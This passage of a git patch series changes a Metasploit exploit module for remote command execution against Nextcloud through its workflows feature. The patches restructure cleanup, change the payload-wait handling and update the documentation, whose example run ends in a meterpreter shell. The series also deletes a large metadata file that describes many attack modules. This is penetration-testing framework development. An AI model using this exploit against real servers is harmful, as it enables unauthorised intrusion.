a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -110,7 +110,7 @@ def request_token ) @token = res.get_json_document['token'] - fail_with(Failure::Unreachable, '2: Request Token not found') if @token.nil? + fail_with(Failure::UnexpectedReply, '2: Request Token not found') if @token.nil? end def create_workflow(operation) From 09aaf5865c5910d11824cc4ee37a61b6ce46bbdb Mon Sep 17 00:00:00 2001 From: whotwagner Date: Mon, 5 May 2025 15:33:25 +0000 Subject: [PATCH 19/27] Rearranged code and removed wait_for_payload_session --- .../unix/webapp/nextcloud_workflows_rce.md | 7 ++- .../unix/webapp/nextcloud_workflows_rce.rb | 45 ++++++++----------- 2 files changed, 22 insertions(+), 30 deletions(-) diff --git a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md index d69c15c02b817..6beb988b28bff 100644 --- a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md +++ b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md @@ -100,10 +100,6 @@ Example steps in this format (is also in the PR): Remote web path to the nextcloud installation (default: /) -### ListenerTimeout - -Number of seconds to wait for the exploit to connect back (default: 960) - ### USERNAME The low-privileged username to authenticate to nextcloud @@ -147,3 +143,6 @@ msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run meterpreter > getuid Server username: www-data ``` + +## Limitations +Ensure that your `WfsDelay` advanced option is set to a value that allows `cron` to execute the payload. Default is 16 minutes diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index d6cb9a8d5de45..6569f8f4a42fb 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -50,6 +50,7 @@ def initialize(info = {}) ], 'Privileged' => false, 'DisclosureDate' => '2023-03-30', + 'DefaultOptions' => { 'WfsDelay' => 16.minutes.seconds.to_i }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], @@ -62,7 +63,6 @@ def initialize(info = {}) register_options( [ OptString.new('TARGETURI', [true, 'Path to nextcloud', '/']), - OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit to connect back', 960]), OptString.new('USERNAME', [true, 'The username to authenticate as']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ] @@ -171,21 +171,6 @@ def delete_file(user, filename) ) end - # At the end of the module, especially for reverse_tcp payloads, wait for - # the payload to connect back to us. There's a very high probability we - # will lose the payload's signal otherwise. - # - # copied from: linux/http/huawei_hg532n_cmdinject.rb - # - def wait_for_payload_session - print_status 'Waiting for the payload to connect back ..' - created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do - session_created? - end - fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created - print_good 'Payload connected!' - end - def check # For the check command cookie_jar.clear @@ -216,21 +201,29 @@ def exploit def execute_command(cmd, _opts = {}) print_status('Sending payload..') - temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt" - flow_id = create_workflow(cmd.to_s) + @temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt" + @flow_id = create_workflow(cmd.to_s) - fail_with(Failure::UnexpectedReply, 'Unable to create workflow') if flow_id.nil? + fail_with(Failure::UnexpectedReply, 'Unable to create workflow') if @flow_id.nil? print_good('Workflow created') - upload_file(temp_filename) + upload_file(@temp_filename) + end - wait_for_payload_session + def need_cleanup? + defined?(@temp_filename) && @temp_filename + end - if flow_id - print_status('Cleaning up') - delete_workflow(flow_id) - end + def cleanup + super + return unless need_cleanup? + + print_status('Cleaning up') + + delete_workflow(@flow_id) if defined?(@flow_id) && @flow_id + delete_file(datastore['USERNAME'], @temp_filename) if defined?(@temp_filename) && @temp_filename - delete_file(datastore['USERNAME'], temp_filename) + @flow_id = nil + @temp_filename = nil end end From 09fc4353461acdfbd531e4bb2686648c99e5a3cb Mon Sep 17 00:00:00 2001 From: whotwagner Date: Mon, 5 May 2025 16:05:12 +0000 Subject: [PATCH 20/27] Removed db/modules_metadata_base.json from --- db/modules_metadata_base.json | 254129 ------------------------------- 1 file changed, 254129 deletions(-) delete mode 100644 db/modules_metadata_base.json diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json deleted file mode 100644 index 8a4984f1c3fad..0000000000000 --- a/db/modules_metadata_base.json +++ /dev/null @@ -1,254129 +0,0 @@ -{ - "auxiliary_admin/2wire/xslt_password_reset": { - "name": "2Wire Cross-Site Request Forgery Password Reset Vulnerability", - "fullname": "auxiliary/admin/2wire/xslt_password_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-08-15", - "type": "auxiliary", - "author": [ - "hkm ", - "Travis Phillips" - ], - "description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.", - "references": [ - "CVE-2007-4387", - "OSVDB-37667", - "BID-36075", - "URL-https://seclists.org/bugtraq/2007/Aug/225" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb", - "is_install_path": true, - "ref_name": "admin/2wire/xslt_password_reset", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/android/google_play_store_uxss_xframe_rce": { - "name": "Android Browser RCE Through Google Play Store XFO", - "fullname": "auxiliary/admin/android/google_play_store_uxss_xframe_rce", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rafay Baloch", - "joev " - ], - "description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. Second, the Google Play store's web interface fails to enforce a\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.", - "references": [ - "URL-http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/", - "URL-https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581", - "OSVDB-110664", - "CVE-2014-6041" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb", - "is_install_path": true, - "ref_name": "admin/android/google_play_store_uxss_xframe_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_admin/appletv/appletv_display_image": { - "name": "Apple TV Image Remote Control", - "fullname": "auxiliary/admin/appletv/appletv_display_image", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "0a29406d9794e4f9b30b3c5d6702c708", - "sinn3r " - ], - "description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.", - "references": [ - "URL-http://nto.github.io/AirPlay.html" - ], - "platform": "", - "arch": "", - "rport": 7000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb", - "is_install_path": true, - "ref_name": "admin/appletv/appletv_display_image", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/appletv/appletv_display_video": { - "name": "Apple TV Video Remote Control", - "fullname": "auxiliary/admin/appletv/appletv_display_video", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "0a29406d9794e4f9b30b3c5d6702c708", - "sinn3r " - ], - "description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.", - "references": [ - "URL-http://nto.github.io/AirPlay.html" - ], - "platform": "", - "arch": "", - "rport": 7000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb", - "is_install_path": true, - "ref_name": "admin/appletv/appletv_display_video", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/atg/atg_client": { - "name": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client", - "fullname": "auxiliary/admin/atg/atg_client", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jon Hart " - ], - "description": "This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2015/01/22/the-internet-of-gas-station-tank-gauges/", - "URL-https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment", - "URL-https://github.com/sjhilt/GasPot", - "URL-https://github.com/mushorg/conpot", - "URL-https://www.veeder.com/us/automatic-tank-gauge-atg-consoles", - "URL-https://cdn.chipkin.com/files/liz/576013-635.pdf", - "URL-https://docs.veeder.com/gold/download.cfm?doc_id=6227" - ], - "platform": "", - "arch": "", - "rport": 10001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/atg/atg_client.rb", - "is_install_path": true, - "ref_name": "admin/atg/atg_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ALARM", - "description": "I30200 Sensor alarm history (untested)" - }, - { - "name": "ALARM_RESET", - "description": "IS00300 Remote alarm reset (untested)" - }, - { - "name": "CLEAR_RESET", - "description": "IS00200 Clear Reset Flag (untested)" - }, - { - "name": "DELIVERY", - "description": "I20200 Delivery report" - }, - { - "name": "INVENTORY", - "description": "200/I20100 In-tank inventory report" - }, - { - "name": "LEAK", - "description": "I20300 Leak report" - }, - { - "name": "RELAY", - "description": "I40600 Relay status (untested)" - }, - { - "name": "RESET", - "description": "IS00100 Reset (untested)" - }, - { - "name": "SENSOR", - "description": "I30100 Sensor status (untested)" - }, - { - "name": "SENSOR_DIAG", - "description": "IB0100 Sensor diagnostics (untested)" - }, - { - "name": "SET_TANK_NAME", - "description": "S602 set tank name (use TANK_NUMBER and TANK_NAME options)" - }, - { - "name": "SHIFT", - "description": "I20400 Shift report" - }, - { - "name": "STATUS", - "description": "I20500 In-tank status report" - }, - { - "name": "SYSTEM_STATUS", - "description": "I10100 System status report (untested)" - }, - { - "name": "TANK_ALARM", - "description": "I20600 Tank alarm history (untested)" - }, - { - "name": "TANK_DIAG", - "description": "IA0100 Tank diagnostics (untested)" - }, - { - "name": "VERSION", - "description": "Version information" - } - ] - }, - "auxiliary_admin/aws/aws_launch_instances": { - "name": "Launches Hosts in AWS", - "fullname": "auxiliary/admin/aws/aws_launch_instances", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Javier Godinez " - ], - "description": "This module will attempt to launch an AWS instances (hosts) in EC2.", - "references": [ - "URL-https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ", - "URL-https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb", - "is_install_path": true, - "ref_name": "admin/aws/aws_launch_instances", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/backupexec/dump": { - "name": "Veritas Backup Exec Windows Remote File Access", - "fullname": "auxiliary/admin/backupexec/dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm ", - "Unknown" - ], - "description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.", - "references": [ - "CVE-2005-2611", - "OSVDB-18695", - "BID-14551", - "URL-https://web.archive.org/web/20120227144337/http://www.fpns.net/willy/msbksrc.lzh" - ], - "platform": "", - "arch": "", - "rport": 10000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/backupexec/dump.rb", - "is_install_path": true, - "ref_name": "admin/backupexec/dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/backupexec/registry": { - "name": "Veritas Backup Exec Server Registry Access", - "fullname": "auxiliary/admin/backupexec/registry", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This modules exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.", - "references": [ - "OSVDB-17627", - "CVE-2005-0771", - "URL-https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269" - ], - "platform": "", - "arch": "", - "rport": 6106, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/backupexec/registry.rb", - "is_install_path": true, - "ref_name": "admin/backupexec/registry", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Create Logon Notice", - "description": "Add a logon notice" - }, - { - "name": "System Information", - "description": "Dump system info (user, owner, OS, CPU...)" - } - ] - }, - "auxiliary_admin/chromecast/chromecast_reset": { - "name": "Chromecast Factory Reset DoS", - "fullname": "auxiliary/admin/chromecast/chromecast_reset", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.", - "references": [ - "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" - ], - "platform": "", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb", - "is_install_path": true, - "ref_name": "admin/chromecast/chromecast_reset", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Reboot", - "description": "Reboot only" - }, - { - "name": "Reset", - "description": "Factory reset" - } - ] - }, - "auxiliary_admin/chromecast/chromecast_youtube": { - "name": "Chromecast YouTube Remote Control", - "fullname": "auxiliary/admin/chromecast/chromecast_youtube", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module acts as a simple remote control for Chromecast YouTube.\n\n Only the deprecated DIAL protocol is supported by this module.\n Casting via the newer CASTV2 protocol is unsupported at this time.", - "references": [ - "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" - ], - "platform": "", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2019-05-29 12:19:52 +0000", - "path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb", - "is_install_path": true, - "ref_name": "admin/chromecast/chromecast_youtube", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Play", - "description": "Play video" - }, - { - "name": "Stop", - "description": "Stop video" - } - ] - }, - "auxiliary_admin/citrix/citrix_netscaler_config_decrypt": { - "name": "Decrypt Citrix NetScaler Config Secrets", - "fullname": "auxiliary/admin/citrix/citrix_netscaler_config_decrypt", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-05-19", - "type": "auxiliary", - "author": [ - "npm " - ], - "description": "This module takes a Citrix NetScaler ns.conf configuration file as\n input and extracts secrets that have been stored with reversible\n encryption. The module supports legacy NetScaler encryption (RC4)\n as well as the newer AES-256-ECB and AES-256-CBC encryption types.\n It is also possible to decrypt secrets protected by the Key\n Encryption Key (KEK) method, provided the key fragment files F1.key\n and F2.key are provided.", - "references": [ - "URL-https://dozer.nz/posts/citrix-decrypt/", - "URL-https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/" - ], - "platform": "BSD", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb", - "is_install_path": true, - "ref_name": "admin/citrix/citrix_netscaler_config_decrypt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Dump", - "description": "Dump secrets from NetScaler configuration" - } - ] - }, - "auxiliary_admin/db2/db2rcmd": { - "name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability", - "fullname": "auxiliary/admin/db2/db2rcmd", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-03-04", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a vulnerability in the Remote Command Server\n component in IBM's DB2 Universal Database 8.1. An authenticated\n attacker can send arbitrary commands to the DB2REMOTECMD named pipe\n which could lead to administrator privileges.", - "references": [ - "CVE-2004-0795", - "OSVDB-4180", - "BID-9821" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/admin/db2/db2rcmd.rb", - "is_install_path": true, - "ref_name": "admin/db2/db2rcmd", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/dcerpc/cve_2020_1472_zerologon": { - "name": "Netlogon Weak Cryptographic Authentication", - "fullname": "auxiliary/admin/dcerpc/cve_2020_1472_zerologon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Tom Tervoort", - "Spencer McIntyre", - "Dirk-jan Mollema" - ], - "description": "A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to it's original value. Failure\n to do so can result in service instability.", - "references": [ - "CVE-2020-1472", - "URL-https://www.secura.com/blog/zero-logon", - "URL-https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py", - "URL-https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2022-08-03 14:27:30 +0000", - "path": "/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/cve_2020_1472_zerologon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Zerologon" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "REMOVE", - "description": "Remove the machine account password" - }, - { - "name": "RESTORE", - "description": "Restore the machine account password" - } - ] - }, - "auxiliary_admin/dcerpc/cve_2022_26923_certifried": { - "name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)", - "fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Oliver Lyak", - "CravateRouge", - "Erik Wynter", - "Christophe De La Fuente" - ], - "description": "This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.", - "references": [ - "URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", - "URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html", - "CVE-2022-26923" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2025-03-21 10:30:20 +0000", - "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/cve_2022_26923_certifried", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "Certifried" - ], - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "AUTHENTICATE", - "description": "Same as REQUEST_CERT but also authenticate" - }, - { - "name": "PRIVESC", - "description": "Full privilege escalation attack" - }, - { - "name": "REQUEST_CERT", - "description": "Request a certificate with DNS host name matching the DC" - } - ] - }, - "auxiliary_admin/dcerpc/icpr_cert": { - "name": "ICPR Certificate Management", - "fullname": "auxiliary/admin/dcerpc/icpr_cert", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Will Schroeder", - "Lee Christensen", - "Oliver Lyak", - "Spencer McIntyre" - ], - "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.\n\n This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.", - "references": [ - "URL-https://github.com/GhostPack/Certify", - "URL-https://github.com/ly4k/Certipy" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2025-03-21 10:30:20 +0000", - "path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/icpr_cert", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ], - "AKA": [ - "Certifry", - "Certipy" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "REQUEST_CERT", - "description": "Request a certificate" - } - ] - }, - "auxiliary_admin/dcerpc/samr_account": { - "name": "SAMR Account Management", - "fullname": "auxiliary/admin/dcerpc/samr_account", - "aliases": [ - "auxiliary/admin/dcerpc/samr_computer" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "JaGoTu", - "Spencer McIntyre", - "smashery" - ], - "description": "Add, lookup and delete user / machine accounts via MS-SAMR. By default\n standard active directory users can add up to 10 new computers to the\n domain (MachineAccountQuota). Administrative privileges however are required\n to delete the created accounts, or to create/delete user accounts.", - "references": [ - "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/dcerpc/samr_account.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/samr_account", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ], - "AKA": [ - "samr_computer", - "samr_user" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "ADD_COMPUTER", - "description": "Add a computer account" - }, - { - "name": "ADD_USER", - "description": "Add a user account" - }, - { - "name": "DELETE_ACCOUNT", - "description": "Delete a computer or user account" - }, - { - "name": "LOOKUP_ACCOUNT", - "description": "Lookup a computer or user account" - } - ] - }, - "auxiliary_admin/dns/dyn_dns_update": { - "name": "DNS Server Dynamic Update Record Injection", - "fullname": "auxiliary/admin/dns/dyn_dns_update", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "King Sabri ", - "Brent Cook " - ], - "description": "This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.", - "references": [ - "URL-https://www.tenable.com/plugins/nessus/35372", - "URL-https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject", - "URL-https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/", - "URL-https://github.com/ChrisTruncer/PenTestScripts/blob/master/HostScripts/DNSInject.py" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb", - "is_install_path": true, - "ref_name": "admin/dns/dyn_dns_update", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add a new record. Fail if it already exists." - }, - { - "name": "DELETE", - "description": "Delete an existing record." - }, - { - "name": "UPDATE", - "description": "Add or update a record. (default)" - } - ] - }, - "auxiliary_admin/edirectory/edirectory_dhost_cookie": { - "name": "Novell eDirectory DHOST Predictable Session Cookie", - "fullname": "auxiliary/admin/edirectory/edirectory_dhost_cookie", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.", - "references": [ - "CVE-2009-4655", - "OSVDB-60035" - ], - "platform": "", - "arch": "", - "rport": 8030, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2018-07-08 19:00:11 +0000", - "path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb", - "is_install_path": true, - "ref_name": "admin/edirectory/edirectory_dhost_cookie", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/edirectory/edirectory_edirutil": { - "name": "Novell eDirectory eMBox Unauthenticated File Access", - "fullname": "auxiliary/admin/edirectory/edirectory_edirutil", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Nicob", - "MC ", - "sinn3r " - ], - "description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, 